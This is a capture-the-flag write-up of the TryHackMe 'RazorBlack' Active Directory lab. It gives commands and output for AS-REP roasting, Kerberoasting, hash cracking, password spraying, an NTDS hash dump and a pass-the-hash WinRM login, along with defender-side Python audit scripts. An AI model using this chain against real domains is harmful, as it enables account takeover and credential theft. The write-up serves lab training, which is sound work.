TryHackMe - RazorBlack

Introduction

This is a TryHackMe room which can be found at: RazorBlack

These guys call themselves hackers. Can you show them who’s the boss ??

Reconnaissance & Scanning

Perform an nmap scan of all TCP ports to identify open ports and services.

  • Command: nmap -p- -T4 10.10.43.148
geobour98@kali:~$ nmap -p- -T4 10.10.43.148
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-13 19:00 EET                                                                                  
Nmap scan report for 10.10.43.148 (10.10.43.148)                                                                                               
Host is up (0.067s latency).                                                                                                                     
Not shown: 65506 closed tcp ports (conn-refused)                                                                                                 
PORT      STATE SERVICE                                                                                                                          
53/tcp    open  domain                                                                                                                           
88/tcp    open  kerberos-sec                                                                                                                     
111/tcp   open  rpcbind                                                                                                                          
135/tcp   open  msrpc                                                                                                                            
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2049/tcp  open  nfs
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49672/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49679/tcp open  unknown
49694/tcp open  unknown
49703/tcp open  unknown
49710/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 66.90 seconds

Perform an aggressive nmap scan (OS detection, default scripts and version detection) against the ports found.

  • Command: sudo nmap -A -sC -p 53,88,111,135,139,389,445,464,593,636,2049,3268,3269,3389,5985,9389,47001 10.10.43.148
geobour98@kali:~$ sudo nmap -A -sC -p 53,88,111,135,139,389,445,464,593,636,2049,3268,3269,3389,5985,9389,47001 10.10.43.148 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-13 19:04 EET                                                                                  
Nmap scan report for 10.10.43.148 (10.10.43.148)                                                                                               
Host is up (0.068s latency).                                                                                                                     
                                                                                                                                                 
PORT      STATE SERVICE       VERSION                                                                                                            
53/tcp    open  domain        Simple DNS Plus                                                                                                    
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-13 17:05:03Z)                                                     
111/tcp   open  rpcbind       2-4 (RPC #100000)                                                                                                  
| rpcinfo:                                                                                                                                       
|   program version    port/proto  service                                                                                                       
|   100000  2,3,4        111/tcp   rpcbind                                                                                                       
|   100000  2,3,4        111/tcp6  rpcbind                                                                                                       
|   100000  2,3,4        111/udp   rpcbind                                                                                                       
|   100000  2,3,4        111/udp6  rpcbind                                                                                                       
|   100003  2,3         2049/udp   nfs                                                                                                           
|   100003  2,3         2049/udp6  nfs                                                                                                           
|   100003  2,3,4       2049/tcp   nfs                                                                                                           
|   100003  2,3,4       2049/tcp6  nfs                                                                                                           
|   100005  1,2,3       2049/tcp   mountd                                                                                                        
|   100005  1,2,3       2049/tcp6  mountd                                                                                                        
|   100005  1,2,3       2049/udp   mountd                                                                                                        
|   100005  1,2,3       2049/udp6  mountd                                                                                                        
|   100021  1,2,3,4     2049/tcp   nlockmgr                                                                                                      
|   100021  1,2,3,4     2049/tcp6  nlockmgr                                                                                                      
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr                                                                                                      
|   100024  1           2049/tcp   status                                                                                                        
|   100024  1           2049/tcp6  status                                                                                                        
|   100024  1           2049/udp   status                                                                                                        
|_  100024  1           2049/udp6  status                                                                                                        
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                              
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                      
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  mountd        1-3 (RPC #100005)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RAZ0RBLACK
|   NetBIOS_Domain_Name: RAZ0RBLACK
|   NetBIOS_Computer_Name: HAVEN-DC
|   DNS_Domain_Name: raz0rblack.thm
|   DNS_Computer_Name: HAVEN-DC.raz0rblack.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-13T17:05:50+00:00
|_ssl-date: 2022-11-13T17:05:59+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=HAVEN-DC.raz0rblack.thm
| Not valid before: 2022-11-12T16:58:09
|_Not valid after:  2023-05-14T16:58:09
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                      
|_http-title: Not Found                                                                                                                          
9389/tcp  open  mc-nmf        .NET Message Framing                                                                                               
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 1909 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows 

Host script results:
| smb2-time: 
|   date: 2022-11-13T17:05:54
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   69.73 ms 10.8.0.1 (10.8.0.1)
2   69.72 ms 10.10.43.148 (10.10.43.148)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.03 seconds

We notice that the domain is raz0rblack.thm and the computer name is HAVEN-DC.raz0rblack.thm.

We add this domain name and the target IP address to the /etc/hosts file.

Exploitation

We start by enumerating the NFS service on port 2049 to identify any exported directories we can mount.

  • Command: showmount -e 10.10.43.148
geobour98@kali:~$ showmount -e 10.10.43.148
Export list for 10.10.43.148:
/users (everyone)

We create the directory /mnt/raz0rblack and mount the /users export on it.

  • Command: sudo mount -t nfs 10.10.43.148:/users /mnt/raz0rblack
geobour98@kali:~$ sudo mkdir /mnt/raz0rblack
geobour98@kali:~$ sudo mount -t nfs 10.10.43.148:/users /mnt/raz0rblack
geobour98@kali:~$ sudo cat /mnt/raz0rblack/sbradley.txt
[REDACTED]
geobour98@kali:~$ sudo libreoffice /mnt/raz0rblack/employee_status.xlsx

We first find Steven's flag in /mnt/raz0rblack/sbradley.txt. The file name sbradley.txt also suggests that the username format is the first letter of the first name concatenated with the last name (e.g. steven bradley -> sbradley).

By opening /mnt/raz0rblack/employee_status.xlsx with LibreOffice, we find a list of first and last names.

  • Command: libreoffice employee_status.xlsx
daven port
imogen royce
tamara vidal
arthur edwards
carl ingram
nolan cassidy
reza zaydan
ljudmila vetrova
rico delgado
tyson williams
steven bradley
chamber lin

Now we create a wordlist of usernames (usernames.txt) in that format. It should look like this:

dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradley
clin

We can use this wordlist (usernames.txt) to perform an AS-REP Roasting attack, which harvests AS-REP responses for the users in the list that have Kerberos pre-authentication disabled. Part of each response is encrypted with a key derived from the user's password, so it can be cracked offline.

For this we use the GetNPUsers.py script from impacket.

  • Command: /opt/impacket/examples/GetNPUsers.py raz0rblack.thm/ -usersfile usernames.txt
geobour98@kali:~$ /opt/impacket/examples/GetNPUsers.py raz0rblack.thm/ -usersfile usernames.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:b06cf7e41f643f8b3125503cfe1da6f0$5b13a70865c099fb16a7205ad2baf0acdef3467ce49313f512e14594dd4b6cab244fb6b37827dc8a098bf782885da1dbfed88623ca32e03a74b64775b6c0b20995c2ef6aeb16673e47625cfc331d08a20bd9e5ea8e6ff4b4ed6e36a46331e077eafd1e2dc97e18d6f553462f244e31083786f3a15d5427b4168e86c1cb6376bbbeeff64352082c0f2b00f5dfe0162e8d422e09dee2da12fdf9422a8c74c8185c752c181d79c24f091de9aeab5865cff73d7d2c03e3f6983f7473b0c028ddbff2bf0eb3f4d8a902273a8d38c4fc0e4aa42ed96abbdf07a4c58cb4ecbfbcd7b916a9340ea6b38f8ef086f61bf386b37c55
[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

We found the hash for the user twilliams, which we put in a file (hash.txt) and crack with hashcat in mode 18200 (Kerberos 5 AS-REP, etype 23).

  • Command: hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
geobour98@kali:~$ hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
<snip>
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:b06cf7e41f643f8b3125503cfe1da6f0$5b13a70865c099fb16a7205ad2baf0acdef3467ce49313f512e14594dd4b6cab244fb6b37827dc8a098bf782885da1dbfed88623ca32e03a74b64775b6c0b20995c2ef6aeb16673e47625cfc331d08a20bd9e5ea8e6ff4b4ed6e36a46331e077eafd1e2dc97e18d6f553462f244e31083786f3a15d5427b4168e86c1cb6376bbbeeff64352082c0f2b00f5dfe0162e8d422e09dee2da12fdf9422a8c74c8185c752c181d79c24f091de9aeab5865cff73d7d2c03e3f6983f7473b0c028ddbff2bf0eb3f4d8a902273a8d38c4fc0e4aa42ed96abbdf07a4c58cb4ecbfbcd7b916a9340ea6b38f8ef086f61bf386b37c55:roastpotatoes
<snip>

So, the cleartext password for twilliams is roastpotatoes.

Now we can perform a Kerberoasting attack, which requests service tickets for Service Principal Names (SPNs) that are associated with normal user accounts. Part of each returned ticket is encrypted with the service account's password hash, so it can be brute-forced offline.

  • Command: /opt/impacket/examples/GetUserSPNs.py raz0rblack.thm/twilliams:'roastpotatoes' -request
geobour98@kali:~$ /opt/impacket/examples/GetUserSPNs.py raz0rblack.thm/twilliams:'roastpotatoes' -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName                   Name     MemberOf                                                    PasswordLastSet             LastLogon  Delegation 
-------------------------------------  -------  ----------------------------------------------------------  --------------------------  ---------  ----------
HAVEN-DC/xyan1d3.raz0rblack.thm:60111  xyan1d3  CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm  2021-02-23 17:17:17.715160  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*xyan1d3$RAZ0RBLACK.THM$raz0rblack.thm/xyan1d3*$3ca38240ade1692b388a4bc390cae312$<snip>

We found the hash for the user xyan1d3, which we put in a file (hash1.txt) and crack with hashcat in mode 13100 (Kerberos 5 TGS-REP, etype 23).

  • Command: hashcat -m 13100 -a 0 hash1.txt /usr/share/wordlists/rockyou.txt
geobour98@kali:~$ hashcat -m 13100 -a 0 hash1.txt /usr/share/wordlists/rockyou.txt
<snip>
$krb5tgs$23$*xyan1d3$RAZ0RBLACK.THM$raz0rblack.thm/xyan1d3*$3ca38240ade1692b388a4bc390cae312$<snip>:cyanide9amine5628
<snip>

So, the cleartext password for xyan1d3 is cyanide9amine5628.
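Both attacks above work because of account attributes that a defender can query from the directory: the UF_DONT_REQUIRE_PREAUTH flag on twilliams and an SPN registered on the ordinary user account xyan1d3. The following Python is an added example, not code from the room or from impacket; it runs those checks over constructed records shaped like the LDAP attributes sAMAccountName, userAccountControl, servicePrincipalName and pwdLastSet (the SPN string is the one from the GetUserSPNs output above; everything else is made up).

```python
"""Checks for the account conditions that enable AS-REP roasting and
Kerberoasting, plus the expired-password state behind a
STATUS_PASSWORD_MUST_CHANGE logon result.

Added example for this write-up; the records are constructed to look like
LDAP attribute values and are not data from the room.
"""

# userAccountControl flag bits as documented by Microsoft.
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

SAMPLE_ACCOUNTS = [  # constructed records, not directory data from the room
    {"sAMAccountName": "twilliams",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH,
     "servicePrincipalName": [], "pwdLastSet": 132580000000000000},
    {"sAMAccountName": "xyan1d3",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
     "servicePrincipalName": ["HAVEN-DC/xyan1d3.raz0rblack.thm:60111"],
     "pwdLastSet": 132580000000000000},
    {"sAMAccountName": "sbradley",
     "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": [], "pwdLastSet": 0},
    {"sAMAccountName": "lvetrova",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
     "servicePrincipalName": [], "pwdLastSet": 132580000000000000},
    {"sAMAccountName": "HAVEN-DC$",
     "userAccountControl": 0x82000,  # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
     "servicePrincipalName": ["ldap/HAVEN-DC.raz0rblack.thm"],
     "pwdLastSet": 132580000000000000},
    {"sAMAccountName": "oldsvc",
     "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH | PASSWD_NOTREQD,
     "servicePrincipalName": [], "pwdLastSet": 132580000000000000},
]


def audit_account(rec):
    """Return the list of findings for one account record."""
    name = rec["sAMAccountName"]
    uac = int(rec.get("userAccountControl", 0))
    spns = rec.get("servicePrincipalName") or []
    disabled = bool(uac & ACCOUNTDISABLE)
    findings = []
    if uac & DONT_REQ_PREAUTH:
        # The KDC hands out an AS-REP for this account without any proof of
        # the password, so part of the reply can be cracked offline.
        note = " (account disabled: fix before re-enabling)" if disabled else ""
        findings.append("AS-REP roastable: pre-authentication not required" + note)
    if disabled:
        return findings  # the remaining checks only matter for live accounts
    if spns and not name.endswith("$"):
        # Any domain user can request a service ticket for these SPNs, and
        # that ticket is encrypted with this account's password hash.
        findings.append(f"Kerberoastable: {len(spns)} SPN(s) on a user account")
    if uac & PASSWD_NOTREQD:
        findings.append("PASSWD_NOTREQD set: a blank password is permitted")
    if int(rec.get("pwdLastSet", 1)) == 0:
        # pwdLastSet of 0 means the user must change the password at next
        # logon; SMB reports this as STATUS_PASSWORD_MUST_CHANGE.
        findings.append("password must be changed at next logon (pwdLastSet = 0)")
    return findings


def audit_accounts(records):
    """Map sAMAccountName -> findings for every record that has any."""
    report = {}
    for rec in records:
        findings = audit_account(rec)
        if findings:
            report[rec["sAMAccountName"]] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_accounts(SAMPLE_ACCOUNTS).items():
        for finding in findings:
            print(f"{name}: {finding}")
```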

We can log in as xyan1d3 using evil-winrm. To find xyan1d3's flag we need to decrypt some secret data that was stored with PowerShell. The commands can be found here: How To Save and Read Sensitive Data with PowerShell.

geobour98@kali:~$ evil-winrm -i 10.10.43.148 -u xyan1d3 -p cyanide9amine5628                                                                                   
                                                                                                                                                 
Evil-WinRM shell v3.4                                                                                                                            
                                                                                                                                                 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine          

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> cd ..
*Evil-WinRM* PS C:\Users\xyan1d3> dir
<snip>
-a----        2/25/2021   9:33 AM           1826 xyan1d3.xml
<snip>
*Evil-WinRM* PS C:\Users\xyan1d3> $credential = Import-CliXml -Path xyan1d3.xml
*Evil-WinRM* PS C:\Users\xyan1d3> $credential.GetNetworkCredential().Password
LOL here it is -> [REDACTED]

Now we can use crackmapexec against SMB to check which users can authenticate and what they can access. Before doing this we create a file with the passwords found so far (passwords.txt), which should look like this:

roastpotatoes
cyanide9amine5628

  • Command: crackmapexec smb 10.10.43.148 -u usernames.txt -p passwords.txt --continue-on-success
geobour98@kali:~$ crackmapexec smb 10.10.136.136 -u usernames.txt -p passwords.txt --continue-on-success
SMB         10.10.43.148    445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\dport:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\dport:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\iroyce:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\iroyce:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\tvidal:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\tvidal:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\aedwards:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\aedwards:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\cingram:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\cingram:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\ncassidy:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\ncassidy:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\rzaydan:roastpotatoes STATUS_LOGON_FAILURE
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\rzaydan:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\rdelgado:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\rdelgado:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [+] raz0rblack.thm\twilliams:roastpotatoes 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\twilliams:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\sbradley:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\clin:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\clin:cyanide9amine5628 STATUS_LOGON_FAILURE

The most interesting finding is raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE, which means that the password roastpotatoes is correct for sbradley but has expired, so we are able to change it to whatever we want. We could do this with smbpasswd, but it didn't work for me, so I used smbpasswd.py from impacket.

  • Command: sudo python3 /opt/impacket/examples/smbpasswd.py sbradley:roastpotatoes@10.10.43.148 -newpass password
geobour98@kali:~$ sudo python3 /opt/impacket/examples/smbpasswd.py sbradley:roastpotatoes@10.10.43.148 -newpass password
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

Now we can log in to SMB using the credentials sbradley:password.

  • Command: smbmap -H 10.10.43.148 -u sbradley -p password
geobour98@kali:~$ smbmap -H 10.10.43.148 -u sbradley -p password
[+] IP: 10.10.43.148:445        Name: 10.10.43.148                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        trash                                                   READ ONLY       Files Pending for deletion

We notice that the user sbradley has READ access to the trash share, so we download all the files from it.

geobour98@kali:~$ smbclient \\\\10.10.43.148\\trash -U sbradley
Password for [WORKGROUP\sbradley]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Mar 16 08:01:28 2021
  ..                                  D        0  Tue Mar 16 08:01:28 2021
  chat_log_20210222143423.txt         A     1340  Thu Feb 25 21:29:05 2021
  experiment_gone_wrong.zip           A 18927164  Tue Mar 16 08:02:20 2021
  sbradley.txt                        A       37  Sat Feb 27 21:24:21 2021

                5101823 blocks of size 4096. 950782 blocks available
smb: \> prompt off
smb: \> mget *
getting file \chat_log_20210222143423.txt of size 1340 as chat_log_20210222143423.txt (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \experiment_gone_wrong.zip of size 18927164 as experiment_gone_wrong.zip (1573.3 KiloBytes/sec) (average 1479.9 KiloBytes/sec)
getting file \sbradley.txt of size 37 as sbradley.txt (0.1 KiloBytes/sec) (average 1429.9 KiloBytes/sec)

The zip file (experiment_gone_wrong.zip) is password protected, so we generate a hash of it with zip2john and crack it with john.

geobour98@kali:~$ zip2john experiment_gone_wrong.zip > experiment.hash
geobour98@kali:~$ john -w=/usr/share/wordlists/rockyou.txt experiment.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)     
1g 0:00:00:10 DONE (2022-11-14 23:28) 0.09532g/s 799676p/s 799676c/s 799676C/s elliotfrost..ejsa457
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now we can unzip the file with the password electromagnetismo and see its contents.

geobour98@kali:~$ unzip experiment_gone_wrong.zip 
Archive:  experiment_gone_wrong.zip
[experiment_gone_wrong.zip] system.hive password: 
  inflating: system.hive             
  inflating: ntds.dit

Having found the files system.hive and ntds.dit, we can use the secretsdump.py script from impacket to extract the NT hashes of all domain accounts. We add the -just-dc-ntlm flag to return only the NTLM hashes, and pipe the output through cut and grep to keep only the fourth colon-separated field (the 32-character NT hash), which gives us a wordlist of hashes in the form crackmapexec expects.

  • Command: sudo /opt/impacket/examples/secretsdump.py -system system.hive -ntds ntds.dit LOCAL -just-dc-ntlm | cut -d ":" -f 4 | grep -wE '^.{32}' > hashes.txt
geobour98@kali:~$ sudo /opt/impacket/examples/secretsdump.py -system system.hive -ntds ntds.dit LOCAL -just-dc-ntlm | cut -d ":" -f 4 | grep -wE '^.{32}' > hashes.txt
geobour98@kali:~$ head -n 10 hashes.txt
1afedc472d0fdfe07cd075d36804efd0
31d6cfe0d16ae931b73c59d7e0c089c0
4ea59b8f64c94ec66ddcfc4e6e5899f9
703a365974d7c3eeb80e11dd27fb0cb3
da3542420eff7cfab8305a68b7da7043
c378739d7c136c1281d06183665702ea
9f73aaafc3b6d62acdbb0b426f302f9e
6a5bad944868142e65ad3049a393e587
b112332330f11267486d21549d326bd5
f9b8c9864aa7bc53405ed45b48ef19ef

The first 10 lines of the file hashes.txt should look like above.
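The cut/grep pipeline above keeps only the hash column and throws the account names away. The following Python, added here as an example and not part of the original write-up or of impacket, parses the same secretsdump line format (user:rid:lmhash:nthash:::) and runs the checks a defender would want on an NTDS dump from an authorised assessment: blank passwords, LM hashes still stored, and one password shared by several accounts. The dump it parses is constructed; only the two empty-password constants are real values.

```python
"""Audit of secretsdump -just-dc-ntlm output (user:rid:lmhash:nthash:::).

Added example for this write-up, not code from the room or from impacket.
SAMPLE_DUMP is constructed: the account names mirror the write-up, the
hashes are made up, except for the two well-known empty-password values.
"""
from collections import defaultdict

# MD4 of the empty UTF-16LE string: the NT hash of a blank password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash field value when no LM hash is stored (the normal, safe state).
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

SAMPLE_DUMP = r"""
[*] Target system bootKey: 0x0123456789abcdef0123456789abcdef
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a:::
raz0rblack.thm\twilliams:1106:aad3b435b51404eeaad3b435b51404ee:2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b:::
raz0rblack.thm\sbradley:1107:aad3b435b51404eeaad3b435b51404ee:2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b:::
raz0rblack.thm\lvetrova:1108:aad3b435b51404eeaad3b435b51404ee:3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c:::
raz0rblack.thm\legacy_svc:1109:0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b:4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d:::
[*] Cleaning up...
"""


def _is_hex32(value):
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def parse_dump(text):
    """Return {account: (rid, lm_hash, nt_hash)} for each credential line."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue  # progress messages, not credentials
        parts = line.split(":")
        if len(parts) < 4:
            continue
        account, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (rid.isdigit() and _is_hex32(lm) and _is_hex32(nt)):
            continue  # anything else that happened to contain colons
        creds[account] = (int(rid), lm, nt)
    return creds


def nt_hash_wordlist(creds):
    """Unique NT hashes, one per line: what the cut | grep pipeline above
    produces, minus the duplicates."""
    return sorted({nt for _, _, nt in creds.values()})


def audit(creds):
    """Findings a defender would raise on this dump."""
    findings = []
    by_nt = defaultdict(list)
    for account, (_rid, lm, nt) in creds.items():
        short = account.split("\\")[-1]
        if nt == EMPTY_NT_HASH:
            findings.append((account, "blank password (empty NT hash)"))
        if lm != EMPTY_LM_HASH:
            findings.append((account, "LM hash stored: legacy hashing still enabled"))
        if not short.endswith("$") and nt != EMPTY_NT_HASH:
            by_nt[nt].append(account)  # machine accounts have random passwords
    for nt, accounts in by_nt.items():
        if len(accounts) > 1:
            findings.append((", ".join(sorted(accounts)),
                             "identical NT hash: password reuse across accounts"))
    return findings


if __name__ == "__main__":
    creds = parse_dump(SAMPLE_DUMP)
    print(f"{len(creds)} accounts, {len(nt_hash_wordlist(creds))} unique NT hashes")
    for who, what in audit(creds):
        print(f"{who}: {what}")
```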

Now we can run crackmapexec to check whether any of the users can log in via WinRM using one of these hashes.

  • Command: crackmapexec winrm 10.10.43.148 -u usernames.txt -H hashes.txt
geobour98@kali:~$ crackmapexec winrm 10.10.43.148 -u usernames.txt -H hashes.txt
<snip>
WINRM       10.10.43.148     5985   HAVEN-DC         [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d (Pwn3d!)
<snip>

So, Ljudmila Vetrova's (lvetrova) NT hash is f220d3988deb3f516c73f40ee16c431d, and we can use evil-winrm with that hash to log in as lvetrova. We follow the same process as for xyan1d3 to view the flag.

  • Command: evil-winrm -i 10.10.43.148 -u lvetrova -H f220d3988deb3f516c73f40ee16c431d
geobour98@kali:~$ evil-winrm -i 10.10.43.148 -u lvetrova -H f220d3988deb3f516c73f40ee16c431d

